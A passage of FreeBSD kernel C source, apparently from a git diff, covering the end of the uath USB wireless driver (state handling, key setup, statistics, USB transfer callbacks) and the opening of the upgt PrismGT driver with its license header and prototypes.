break; case IEEE80211_S_AUTH: /* XXX good place? set RTS threshold */ uath_config(sc, CFG_USER_RTS_THRESHOLD, vap->iv_rtsthreshold); /* XXX bad place */ error = uath_set_keys(sc, vap); if (error != 0) { device_printf(sc->sc_dev, "could not set crypto keys, error %d\n", error); break; } if (uath_switch_channel(sc, ni->ni_chan) != 0) { device_printf(sc->sc_dev, "could not switch channel\n"); break; } if (uath_create_connection(sc, UATH_ID_BSS) != 0) { device_printf(sc->sc_dev, "could not create connection\n"); break; } break; case IEEE80211_S_ASSOC: if (uath_set_rates(sc, &ni->ni_rates) != 0) { device_printf(sc->sc_dev, "could not set negotiated rate set\n"); break; } break; case IEEE80211_S_RUN: /* XXX monitor mode doesn't be tested */ if (ic->ic_opmode == IEEE80211_M_MONITOR) { uath_set_ledstate(sc, 1); break; } /* * Tx rate is controlled by firmware, report the maximum * negotiated rate in ifconfig output. */ ni->ni_txrate = ni->ni_rates.rs_rates[ni->ni_rates.rs_nrates-1]; if (uath_write_associd(sc) != 0) { device_printf(sc->sc_dev, "could not write association id\n"); break; } /* turn link LED on */ uath_set_ledsteady(sc, UATH_LED_LINK, UATH_LED_ON); /* make activity LED blink */ uath_set_ledblink(sc, UATH_LED_ACTIVITY, UATH_LED_ON, 1, 2); /* set state to associated */ uath_set_ledstate(sc, 1); /* start statistics timer */ callout_reset(&sc->stat_ch, hz, uath_stat, sc); break; default: break; } ieee80211_free_node(ni); UATH_UNLOCK(sc); IEEE80211_LOCK(ic); return (uvp->newstate(vap, nstate, arg)); } static int uath_set_key(struct uath_softc *sc, const struct ieee80211_key *wk, int index) { #if 0 struct uath_cmd_crypto crypto; int i; memset(&crypto, 0, sizeof(crypto)); crypto.keyidx = htobe32(index); crypto.magic1 = htobe32(1); crypto.size = htobe32(368); crypto.mask = htobe32(0xffff); crypto.flags = htobe32(0x80000068); if (index != UATH_DEFAULT_KEY) crypto.flags |= htobe32(index << 16); memset(crypto.magic2, 0xff, sizeof(crypto.magic2)); /* * Each byte of the key must be XOR'ed with 10101010 before being * transmitted to the firmware. 
*/ for (i = 0; i < wk->wk_keylen; i++) crypto.key[i] = wk->wk_key[i] ^ 0xaa; DPRINTF(sc, UATH_DEBUG_CRYPTO, "setting crypto key index=%d len=%d\n", index, wk->wk_keylen); return uath_cmd_write(sc, WDCMSG_SET_KEY_CACHE_ENTRY, &crypto, sizeof crypto, 0); #else /* XXX support H/W cryto */ return (0); #endif } static int uath_set_keys(struct uath_softc *sc, struct ieee80211vap *vap) { int i, error; error = 0; for (i = 0; i < IEEE80211_WEP_NKID; i++) { const struct ieee80211_key *wk = &vap->iv_nw_keys[i]; if (wk->wk_flags & (IEEE80211_KEY_XMIT|IEEE80211_KEY_RECV)) { error = uath_set_key(sc, wk, i); if (error) return (error); } } if (vap->iv_def_txkey != IEEE80211_KEYIX_NONE) { error = uath_set_key(sc, &vap->iv_nw_keys[vap->iv_def_txkey], UATH_DEFAULT_KEY); } return (error); } #define UATH_SYSCTL_STAT_ADD32(c, h, n, p, d) \ SYSCTL_ADD_UINT(c, h, OID_AUTO, n, CTLFLAG_RD, p, 0, d) static void uath_sysctl_node(struct uath_softc *sc) { struct sysctl_ctx_list *ctx; struct sysctl_oid_list *child; struct sysctl_oid *tree; struct uath_stat *stats; stats = &sc->sc_stat; ctx = device_get_sysctl_ctx(sc->sc_dev); child = SYSCTL_CHILDREN(device_get_sysctl_tree(sc->sc_dev)); tree = SYSCTL_ADD_NODE(ctx, child, OID_AUTO, "stats", CTLFLAG_RD, NULL, "UATH statistics"); child = SYSCTL_CHILDREN(tree); UATH_SYSCTL_STAT_ADD32(ctx, child, "badchunkseqnum", &stats->st_badchunkseqnum, "Bad chunk sequence numbers"); UATH_SYSCTL_STAT_ADD32(ctx, child, "invalidlen", &stats->st_invalidlen, "Invalid length"); UATH_SYSCTL_STAT_ADD32(ctx, child, "multichunk", &stats->st_multichunk, "Multi chunks"); UATH_SYSCTL_STAT_ADD32(ctx, child, "toobigrxpkt", &stats->st_toobigrxpkt, "Too big rx packets"); UATH_SYSCTL_STAT_ADD32(ctx, child, "stopinprogress", &stats->st_stopinprogress, "Stop in progress"); UATH_SYSCTL_STAT_ADD32(ctx, child, "crcerrs", &stats->st_crcerr, "CRC errors"); UATH_SYSCTL_STAT_ADD32(ctx, child, "phyerr", &stats->st_phyerr, "PHY errors"); UATH_SYSCTL_STAT_ADD32(ctx, child, "decrypt_crcerr", &stats->st_decrypt_crcerr, "Decryption CRC errors"); UATH_SYSCTL_STAT_ADD32(ctx, child, "decrypt_micerr", &stats->st_decrypt_micerr, "Decryption Misc errors"); UATH_SYSCTL_STAT_ADD32(ctx, child, "decomperr", &stats->st_decomperr, "Decomp errors"); UATH_SYSCTL_STAT_ADD32(ctx, child, "keyerr", &stats->st_keyerr, "Key errors"); UATH_SYSCTL_STAT_ADD32(ctx, child, "err", &stats->st_err, "Unknown errors"); UATH_SYSCTL_STAT_ADD32(ctx, child, "cmd_active", &stats->st_cmd_active, "Active numbers in Command queue"); UATH_SYSCTL_STAT_ADD32(ctx, child, "cmd_inactive", &stats->st_cmd_inactive, "Inactive numbers in Command queue"); UATH_SYSCTL_STAT_ADD32(ctx, child, "cmd_pending", &stats->st_cmd_pending, "Pending numbers in Command queue"); UATH_SYSCTL_STAT_ADD32(ctx, child, "cmd_waiting", &stats->st_cmd_waiting, "Waiting numbers in Command queue"); UATH_SYSCTL_STAT_ADD32(ctx, child, "rx_active", &stats->st_rx_active, "Active numbers in RX queue"); UATH_SYSCTL_STAT_ADD32(ctx, child, "rx_inactive", &stats->st_rx_inactive, "Inactive numbers in RX queue"); UATH_SYSCTL_STAT_ADD32(ctx, child, "tx_active", &stats->st_tx_active, "Active numbers in TX queue"); UATH_SYSCTL_STAT_ADD32(ctx, child, "tx_inactive", &stats->st_tx_inactive, "Inactive numbers in TX queue"); UATH_SYSCTL_STAT_ADD32(ctx, child, "tx_pending", &stats->st_tx_pending, "Pending numbers in TX queue"); } #undef UATH_SYSCTL_STAT_ADD32 static void uath_cmdeof(struct uath_softc *sc, struct uath_cmd *cmd) { struct uath_cmd_hdr *hdr; int dlen; hdr = (struct uath_cmd_hdr *)cmd->buf; /* NB: 
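code, len and magic are byte-swapped in place below, while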
msgid is passed thru w/o byte swapping */ #ifdef UATH_DEBUG if (sc->sc_debug & UATH_DEBUG_CMDS) { int len = be32toh(hdr->len); printf("%s: %s [ix %u] len %u status %u\n", __func__, uath_codename(be32toh(hdr->code)), hdr->msgid, len, be32toh(hdr->magic)); if (sc->sc_debug & UATH_DEBUG_CMDS_DUMP) uath_dump_cmd(cmd->buf, len > UATH_MAX_CMDSZ ? sizeof(*hdr) : len, '-'); } #endif hdr->code = be32toh(hdr->code); hdr->len = be32toh(hdr->len); hdr->magic = be32toh(hdr->magic); /* target status on return */ switch (hdr->code & 0xff) { /* reply to a read command */ default: dlen = hdr->len - sizeof(*hdr); if (dlen < 0) { device_printf(sc->sc_dev, "Invalid header length %d\n", dlen); return; } DPRINTF(sc, UATH_DEBUG_RX_PROC | UATH_DEBUG_RECV_ALL, "%s: code %d data len %u\n", __func__, hdr->code & 0xff, dlen); /* * The first response from the target after the * HOST_AVAILABLE has an invalid msgid so we must * treat it specially. */ if (hdr->msgid < UATH_CMD_LIST_COUNT) { uint32_t *rp = (uint32_t *)(hdr+1); u_int olen; if (!(sizeof(*hdr) <= hdr->len && hdr->len < UATH_MAX_CMDSZ)) { device_printf(sc->sc_dev, "%s: invalid WDC msg length %u; " "msg ignored\n", __func__, hdr->len); return; } /* * Calculate return/receive payload size; the * first word, if present, always gives the * number of bytes--unless it's 0 in which * case a single 32-bit word should be present. */ if (dlen >= (int)sizeof(uint32_t)) { olen = be32toh(rp[0]); dlen -= sizeof(uint32_t); if (olen == 0) { /* convention is 0 =>'s one word */ olen = sizeof(uint32_t); /* XXX KASSERT(olen == dlen ) */ } } else olen = 0; if (cmd->odata != NULL) { /* NB: cmd->olen validated in uath_cmd */ if (olen > (u_int)cmd->olen) { /* XXX complain? */ device_printf(sc->sc_dev, "%s: cmd 0x%x olen %u cmd olen %u\n", __func__, hdr->code, olen, cmd->olen); olen = cmd->olen; } if (olen > (u_int)dlen) { /* XXX complain, shouldn't happen */ device_printf(sc->sc_dev, "%s: cmd 0x%x olen %u dlen %u\n", __func__, hdr->code, olen, dlen); olen = dlen; } /* XXX have submitter do this */ /* copy answer into caller's supplied buffer */ bcopy(&rp[1], cmd->odata, olen); cmd->olen = olen; } } wakeup_one(cmd); /* wake up caller */ break; case WDCMSG_TARGET_START: if (hdr->msgid >= UATH_CMD_LIST_COUNT) { /* XXX */ return; } dlen = hdr->len - sizeof(*hdr); if (dlen != (int)sizeof(uint32_t)) { /* XXX something wrong */ return; } /* XXX have submitter do this */ /* copy answer into caller's supplied buffer */ bcopy(hdr+1, cmd->odata, sizeof(uint32_t)); cmd->olen = sizeof(uint32_t); wakeup_one(cmd); /* wake up caller */ break; case WDCMSG_SEND_COMPLETE: /* this notification is sent when UATH_TX_NOTIFY is set */ DPRINTF(sc, UATH_DEBUG_RX_PROC | UATH_DEBUG_RECV_ALL, "%s: received Tx notification\n", __func__); break; case WDCMSG_TARGET_GET_STATS: DPRINTF(sc, UATH_DEBUG_RX_PROC | UATH_DEBUG_RECV_ALL, "%s: received device statistics\n", __func__); callout_reset(&sc->stat_ch, hz, uath_stat, sc); break; } } static void uath_intr_rx_callback(struct usb_xfer *xfer, usb_error_t error) { struct uath_softc *sc = usbd_xfer_softc(xfer); struct uath_cmd *cmd; struct usb_page_cache *pc; int actlen; usbd_xfer_status(xfer, &actlen, NULL, NULL, NULL); UATH_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: cmd = STAILQ_FIRST(&sc->sc_cmd_waiting); if (cmd == NULL) goto setup; STAILQ_REMOVE_HEAD(&sc->sc_cmd_waiting, next); UATH_STAT_DEC(sc, st_cmd_waiting); STAILQ_INSERT_TAIL(&sc->sc_cmd_inactive, cmd, next); UATH_STAT_INC(sc, st_cmd_inactive); KASSERT(actlen >= 
(int)sizeof(struct uath_cmd_hdr), ("short xfer error")); pc = usbd_xfer_get_frame(xfer, 0); usbd_copy_out(pc, 0, cmd->buf, actlen); uath_cmdeof(sc, cmd); case USB_ST_SETUP: setup: usbd_xfer_set_frame_len(xfer, 0, usbd_xfer_max_len(xfer)); usbd_transfer_submit(xfer); break; default: if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); goto setup; } break; } } static void uath_intr_tx_callback(struct usb_xfer *xfer, usb_error_t error) { struct uath_softc *sc = usbd_xfer_softc(xfer); struct uath_cmd *cmd; UATH_ASSERT_LOCKED(sc); cmd = STAILQ_FIRST(&sc->sc_cmd_active); if (cmd != NULL && USB_GET_STATE(xfer) != USB_ST_SETUP) { STAILQ_REMOVE_HEAD(&sc->sc_cmd_active, next); UATH_STAT_DEC(sc, st_cmd_active); STAILQ_INSERT_TAIL((cmd->flags & UATH_CMD_FLAG_READ) ? &sc->sc_cmd_waiting : &sc->sc_cmd_inactive, cmd, next); if (cmd->flags & UATH_CMD_FLAG_READ) UATH_STAT_INC(sc, st_cmd_waiting); else UATH_STAT_INC(sc, st_cmd_inactive); } switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: case USB_ST_SETUP: setup: cmd = STAILQ_FIRST(&sc->sc_cmd_pending); if (cmd == NULL) { DPRINTF(sc, UATH_DEBUG_XMIT, "%s: empty pending queue\n", __func__); return; } STAILQ_REMOVE_HEAD(&sc->sc_cmd_pending, next); UATH_STAT_DEC(sc, st_cmd_pending); STAILQ_INSERT_TAIL((cmd->flags & UATH_CMD_FLAG_ASYNC) ? &sc->sc_cmd_inactive : &sc->sc_cmd_active, cmd, next); if (cmd->flags & UATH_CMD_FLAG_ASYNC) UATH_STAT_INC(sc, st_cmd_inactive); else UATH_STAT_INC(sc, st_cmd_active); usbd_xfer_set_frame_data(xfer, 0, cmd->buf, cmd->buflen); usbd_transfer_submit(xfer); break; default: if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); goto setup; } break; } } static void uath_update_rxstat(struct uath_softc *sc, uint32_t status) { switch (status) { case UATH_STATUS_STOP_IN_PROGRESS: UATH_STAT_INC(sc, st_stopinprogress); break; case UATH_STATUS_CRC_ERR: UATH_STAT_INC(sc, st_crcerr); break; case UATH_STATUS_PHY_ERR: UATH_STAT_INC(sc, st_phyerr); break; case UATH_STATUS_DECRYPT_CRC_ERR: UATH_STAT_INC(sc, st_decrypt_crcerr); break; case UATH_STATUS_DECRYPT_MIC_ERR: UATH_STAT_INC(sc, st_decrypt_micerr); break; case UATH_STATUS_DECOMP_ERR: UATH_STAT_INC(sc, st_decomperr); break; case UATH_STATUS_KEY_ERR: UATH_STAT_INC(sc, st_keyerr); break; case UATH_STATUS_ERR: UATH_STAT_INC(sc, st_err); break; default: break; } } static struct mbuf * uath_data_rxeof(struct usb_xfer *xfer, struct uath_data *data, struct uath_rx_desc **pdesc) { struct uath_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct uath_chunk *chunk; struct uath_rx_desc *desc; struct mbuf *m = data->m, *mnew, *mp; uint16_t chunklen; int actlen; usbd_xfer_status(xfer, &actlen, NULL, NULL, NULL); if (actlen < (int)UATH_MIN_RXBUFSZ) { DPRINTF(sc, UATH_DEBUG_RECV | UATH_DEBUG_RECV_ALL, "%s: wrong xfer size (len=%d)\n", __func__, actlen); ifp->if_ierrors++; return (NULL); } chunk = (struct uath_chunk *)data->buf; if (chunk->seqnum == 0 && chunk->flags == 0 && chunk->length == 0) { device_printf(sc->sc_dev, "%s: strange response\n", __func__); ifp->if_ierrors++; UATH_RESET_INTRX(sc); return (NULL); } if (chunk->seqnum != sc->sc_intrx_nextnum) { DPRINTF(sc, UATH_DEBUG_XMIT, "invalid seqnum %d, expected %d\n", chunk->seqnum, sc->sc_intrx_nextnum); UATH_STAT_INC(sc, st_badchunkseqnum); if (sc->sc_intrx_head != NULL) m_freem(sc->sc_intrx_head); UATH_RESET_INTRX(sc); return (NULL); } /* check multi-chunk frames */ if ((chunk->seqnum == 0 && !(chunk->flags & UATH_CFLAGS_FINAL)) || (chunk->seqnum != 0 && 
(chunk->flags & UATH_CFLAGS_FINAL)) || chunk->flags & UATH_CFLAGS_RXMSG) UATH_STAT_INC(sc, st_multichunk); chunklen = be16toh(chunk->length); if (chunk->flags & UATH_CFLAGS_FINAL) chunklen -= sizeof(struct uath_rx_desc); if (chunklen > 0 && (!(chunk->flags & UATH_CFLAGS_FINAL) || !(chunk->seqnum == 0))) { /* we should use intermediate RX buffer */ if (chunk->seqnum == 0) UATH_RESET_INTRX(sc); if ((sc->sc_intrx_len + sizeof(struct uath_rx_desc) + chunklen) > UATH_MAX_INTRX_SIZE) { UATH_STAT_INC(sc, st_invalidlen); ifp->if_iqdrops++; if (sc->sc_intrx_head != NULL) m_freem(sc->sc_intrx_head); UATH_RESET_INTRX(sc); return (NULL); } m->m_len = chunklen; m->m_data += sizeof(struct uath_chunk); if (sc->sc_intrx_head == NULL) { sc->sc_intrx_head = m; sc->sc_intrx_tail = m; } else { m->m_flags &= ~M_PKTHDR; sc->sc_intrx_tail->m_next = m; sc->sc_intrx_tail = m; } } sc->sc_intrx_len += chunklen; mnew = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (mnew == NULL) { DPRINTF(sc, UATH_DEBUG_RECV | UATH_DEBUG_RECV_ALL, "%s: can't get new mbuf, drop frame\n", __func__); ifp->if_ierrors++; if (sc->sc_intrx_head != NULL) m_freem(sc->sc_intrx_head); UATH_RESET_INTRX(sc); return (NULL); } data->m = mnew; data->buf = mtod(mnew, uint8_t *); /* if the frame is not final continue the transfer */ if (!(chunk->flags & UATH_CFLAGS_FINAL)) { sc->sc_intrx_nextnum++; UATH_RESET_INTRX(sc); return (NULL); } /* * if the frame is not set UATH_CFLAGS_RXMSG, then rx descriptor is * located at the end, 32-bit aligned */ desc = (chunk->flags & UATH_CFLAGS_RXMSG) ? (struct uath_rx_desc *)(chunk + 1) : (struct uath_rx_desc *)(((uint8_t *)chunk) + sizeof(struct uath_chunk) + be16toh(chunk->length) - sizeof(struct uath_rx_desc)); *pdesc = desc; DPRINTF(sc, UATH_DEBUG_RECV | UATH_DEBUG_RECV_ALL, "%s: frame len %u code %u status %u rate %u antenna %u " "rssi %d channel %u phyerror %u connix %u decrypterror %u " "keycachemiss %u\n", __func__, be32toh(desc->framelen) , be32toh(desc->code), be32toh(desc->status), be32toh(desc->rate) , be32toh(desc->antenna), be32toh(desc->rssi), be32toh(desc->channel) , be32toh(desc->phyerror), be32toh(desc->connix) , be32toh(desc->decrypterror), be32toh(desc->keycachemiss)); if (be32toh(desc->len) > MCLBYTES) { DPRINTF(sc, UATH_DEBUG_RECV | UATH_DEBUG_RECV_ALL, "%s: bad descriptor (len=%d)\n", __func__, be32toh(desc->len)); ifp->if_iqdrops++; UATH_STAT_INC(sc, st_toobigrxpkt); if (sc->sc_intrx_head != NULL) m_freem(sc->sc_intrx_head); UATH_RESET_INTRX(sc); return (NULL); } uath_update_rxstat(sc, be32toh(desc->status)); /* finalize mbuf */ if (sc->sc_intrx_head == NULL) { m->m_pkthdr.rcvif = ifp; m->m_pkthdr.len = m->m_len = be32toh(desc->framelen) - UATH_RX_DUMMYSIZE; m->m_data += sizeof(struct uath_chunk); } else { mp = sc->sc_intrx_head; mp->m_pkthdr.rcvif = ifp; mp->m_flags |= M_PKTHDR; mp->m_pkthdr.len = sc->sc_intrx_len; m = mp; } /* there are a lot more fields in the RX descriptor */ if ((sc->sc_flags & UATH_FLAG_INVALID) == 0 && ieee80211_radiotap_active(ic)) { struct uath_rx_radiotap_header *tap = &sc->sc_rxtap; uint32_t tsf_hi = be32toh(desc->tstamp_high); uint32_t tsf_lo = be32toh(desc->tstamp_low); /* XXX only get low order 24bits of tsf from h/w */ tap->wr_tsf = htole64(((uint64_t)tsf_hi << 32) | tsf_lo); tap->wr_flags = 0; if (be32toh(desc->status) == UATH_STATUS_CRC_ERR) tap->wr_flags |= IEEE80211_RADIOTAP_F_BADFCS; /* XXX map other status to BADFCS? 
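(UATH_STATUS_PHY_ERR or UATH_STATUS_DECRYPT_CRC_ERR might also qualify)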
*/ /* XXX ath h/w rate code, need to map */ tap->wr_rate = be32toh(desc->rate); tap->wr_antenna = be32toh(desc->antenna); tap->wr_antsignal = -95 + be32toh(desc->rssi); tap->wr_antnoise = -95; } ifp->if_ipackets++; UATH_RESET_INTRX(sc); return (m); } static void uath_bulk_rx_callback(struct usb_xfer *xfer, usb_error_t error) { struct uath_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_frame *wh; struct ieee80211_node *ni; struct mbuf *m = NULL; struct uath_data *data; struct uath_rx_desc *desc = NULL; int8_t nf; UATH_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: data = STAILQ_FIRST(&sc->sc_rx_active); if (data == NULL) goto setup; STAILQ_REMOVE_HEAD(&sc->sc_rx_active, next); UATH_STAT_DEC(sc, st_rx_active); m = uath_data_rxeof(xfer, data, &desc); STAILQ_INSERT_TAIL(&sc->sc_rx_inactive, data, next); UATH_STAT_INC(sc, st_rx_inactive); /* FALLTHROUGH */ case USB_ST_SETUP: setup: data = STAILQ_FIRST(&sc->sc_rx_inactive); if (data == NULL) return; STAILQ_REMOVE_HEAD(&sc->sc_rx_inactive, next); UATH_STAT_DEC(sc, st_rx_inactive); STAILQ_INSERT_TAIL(&sc->sc_rx_active, data, next); UATH_STAT_INC(sc, st_rx_active); usbd_xfer_set_frame_data(xfer, 0, data->buf, MCLBYTES); usbd_transfer_submit(xfer); /* * To avoid LOR we should unlock our private mutex here to call * ieee80211_input() because here is at the end of a USB * callback and safe to unlock. */ if (sc->sc_flags & UATH_FLAG_INVALID) { if (m != NULL) m_freem(m); return; } UATH_UNLOCK(sc); if (m != NULL && desc != NULL) { wh = mtod(m, struct ieee80211_frame *); ni = ieee80211_find_rxnode(ic, (struct ieee80211_frame_min *)wh); nf = -95; /* XXX */ if (ni != NULL) { (void) ieee80211_input(ni, m, (int)be32toh(desc->rssi), nf); /* node is no longer needed */ ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, (int)be32toh(desc->rssi), nf); m = NULL; desc = NULL; } if ((ifp->if_drv_flags & IFF_DRV_OACTIVE) == 0 && !IFQ_IS_EMPTY(&ifp->if_snd)) uath_start(ifp); UATH_LOCK(sc); break; default: /* needs it to the inactive queue due to a error. */ data = STAILQ_FIRST(&sc->sc_rx_active); if (data != NULL) { STAILQ_REMOVE_HEAD(&sc->sc_rx_active, next); UATH_STAT_DEC(sc, st_rx_active); STAILQ_INSERT_TAIL(&sc->sc_rx_inactive, data, next); UATH_STAT_INC(sc, st_rx_inactive); } if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); ifp->if_ierrors++; goto setup; } break; } } static void uath_data_txeof(struct usb_xfer *xfer, struct uath_data *data) { struct uath_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct mbuf *m; UATH_ASSERT_LOCKED(sc); /* * Do any tx complete callback. Note this must be done before releasing * the node reference. */ if (data->m) { m = data->m; if (m->m_flags & M_TXCB && (sc->sc_flags & UATH_FLAG_INVALID) == 0) { /* XXX status? 
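(the completion status reported here is always 0)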
*/ ieee80211_process_callback(data->ni, m, 0); } m_freem(m); data->m = NULL; } if (data->ni) { if ((sc->sc_flags & UATH_FLAG_INVALID) == 0) ieee80211_free_node(data->ni); data->ni = NULL; } sc->sc_tx_timer = 0; ifp->if_opackets++; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; } static void uath_bulk_tx_callback(struct usb_xfer *xfer, usb_error_t error) { struct uath_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct uath_data *data; UATH_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: data = STAILQ_FIRST(&sc->sc_tx_active); if (data == NULL) goto setup; STAILQ_REMOVE_HEAD(&sc->sc_tx_active, next); UATH_STAT_DEC(sc, st_tx_active); uath_data_txeof(xfer, data); STAILQ_INSERT_TAIL(&sc->sc_tx_inactive, data, next); UATH_STAT_INC(sc, st_tx_inactive); /* FALLTHROUGH */ case USB_ST_SETUP: setup: data = STAILQ_FIRST(&sc->sc_tx_pending); if (data == NULL) { DPRINTF(sc, UATH_DEBUG_XMIT, "%s: empty pending queue\n", __func__); return; } STAILQ_REMOVE_HEAD(&sc->sc_tx_pending, next); UATH_STAT_DEC(sc, st_tx_pending); STAILQ_INSERT_TAIL(&sc->sc_tx_active, data, next); UATH_STAT_INC(sc, st_tx_active); usbd_xfer_set_frame_data(xfer, 0, data->buf, data->buflen); usbd_transfer_submit(xfer); UATH_UNLOCK(sc); uath_start(ifp); UATH_LOCK(sc); break; default: data = STAILQ_FIRST(&sc->sc_tx_active); if (data == NULL) goto setup; if (data->ni != NULL) { if ((sc->sc_flags & UATH_FLAG_INVALID) == 0) ieee80211_free_node(data->ni); data->ni = NULL; ifp->if_oerrors++; } if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); goto setup; } break; } } static device_method_t uath_methods[] = { DEVMETHOD(device_probe, uath_match), DEVMETHOD(device_attach, uath_attach), DEVMETHOD(device_detach, uath_detach), DEVMETHOD_END }; static driver_t uath_driver = { .name = "uath", .methods = uath_methods, .size = sizeof(struct uath_softc) }; static devclass_t uath_devclass; DRIVER_MODULE(uath, uhub, uath_driver, uath_devclass, NULL, 0); MODULE_DEPEND(uath, wlan, 1, 1, 1); MODULE_DEPEND(uath, usb, 1, 1, 1); MODULE_VERSION(uath, 1); diff --git a/sys/dev/usb/wlan/if_upgt.c b/sys/dev/usb/wlan/if_upgt.c index 6c77b3bf358f..a860a2b6910b 100644 --- a/sys/dev/usb/wlan/if_upgt.c +++ b/sys/dev/usb/wlan/if_upgt.c @@ -1,2452 +1,2452 @@ /* $OpenBSD: if_upgt.c,v 1.35 2008/04/16 18:32:15 damien Exp $ */ /* $FreeBSD$ */ /* * Copyright (c) 2007 Marcus Glocker * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "usbdevs.h" #include /* * Driver for the USB PrismGT devices. * * For now just USB 2.0 devices with the GW3887 chipset are supported. 
* The driver has been written based on the firmware version 2.13.1.0_LM87. * * TODO's: * - MONITOR mode test. * - Add HOSTAP mode. * - Add IBSS mode. * - Support the USB 1.0 devices (NET2280, ISL3880, ISL3886 chipsets). * * Parts of this driver has been influenced by reading the p54u driver * written by Jean-Baptiste Note and * Sebastien Bourdeauducq . */ static SYSCTL_NODE(_hw, OID_AUTO, upgt, CTLFLAG_RD, 0, "USB PrismGT GW3887 driver parameters"); #ifdef UPGT_DEBUG int upgt_debug = 0; SYSCTL_INT(_hw_upgt, OID_AUTO, debug, CTLFLAG_RW | CTLFLAG_TUN, &upgt_debug, 0, "control debugging printfs"); TUNABLE_INT("hw.upgt.debug", &upgt_debug); enum { UPGT_DEBUG_XMIT = 0x00000001, /* basic xmit operation */ UPGT_DEBUG_RECV = 0x00000002, /* basic recv operation */ UPGT_DEBUG_RESET = 0x00000004, /* reset processing */ UPGT_DEBUG_INTR = 0x00000008, /* INTR */ UPGT_DEBUG_TX_PROC = 0x00000010, /* tx ISR proc */ UPGT_DEBUG_RX_PROC = 0x00000020, /* rx ISR proc */ UPGT_DEBUG_STATE = 0x00000040, /* 802.11 state transitions */ UPGT_DEBUG_STAT = 0x00000080, /* statistic */ UPGT_DEBUG_FW = 0x00000100, /* firmware */ UPGT_DEBUG_ANY = 0xffffffff }; #define DPRINTF(sc, m, fmt, ...) do { \ if (sc->sc_debug & (m)) \ printf(fmt, __VA_ARGS__); \ } while (0) #else #define DPRINTF(sc, m, fmt, ...) do { \ (void) sc; \ } while (0) #endif /* * Prototypes. */ static device_probe_t upgt_match; static device_attach_t upgt_attach; static device_detach_t upgt_detach; static int upgt_alloc_tx(struct upgt_softc *); static int upgt_alloc_rx(struct upgt_softc *); static int upgt_device_reset(struct upgt_softc *); static void upgt_bulk_tx(struct upgt_softc *, struct upgt_data *); static int upgt_fw_verify(struct upgt_softc *); static int upgt_mem_init(struct upgt_softc *); static int upgt_fw_load(struct upgt_softc *); static int upgt_fw_copy(const uint8_t *, char *, int); static uint32_t upgt_crc32_le(const void *, size_t); static struct mbuf * upgt_rxeof(struct usb_xfer *, struct upgt_data *, int *); static struct mbuf * upgt_rx(struct upgt_softc *, uint8_t *, int, int *); static void upgt_txeof(struct usb_xfer *, struct upgt_data *); static int upgt_eeprom_read(struct upgt_softc *); static int upgt_eeprom_parse(struct upgt_softc *); static void upgt_eeprom_parse_hwrx(struct upgt_softc *, uint8_t *); static void upgt_eeprom_parse_freq3(struct upgt_softc *, uint8_t *, int); static void upgt_eeprom_parse_freq4(struct upgt_softc *, uint8_t *, int); static void upgt_eeprom_parse_freq6(struct upgt_softc *, uint8_t *, int); static uint32_t upgt_chksum_le(const uint32_t *, size_t); static void upgt_tx_done(struct upgt_softc *, uint8_t *); static void upgt_init(void *); static void upgt_init_locked(struct upgt_softc *); static int upgt_ioctl(struct ifnet *, u_long, caddr_t); static void upgt_start(struct ifnet *); static int upgt_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void upgt_scan_start(struct ieee80211com *); static void upgt_scan_end(struct ieee80211com *); static void upgt_set_channel(struct ieee80211com *); static struct ieee80211vap *upgt_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void upgt_vap_delete(struct ieee80211vap *); static void upgt_update_mcast(struct ifnet *); static uint8_t upgt_rx_rate(struct upgt_softc *, const int); static void upgt_set_multi(void *); static void upgt_stop(struct upgt_softc *); static void upgt_setup_rates(struct 
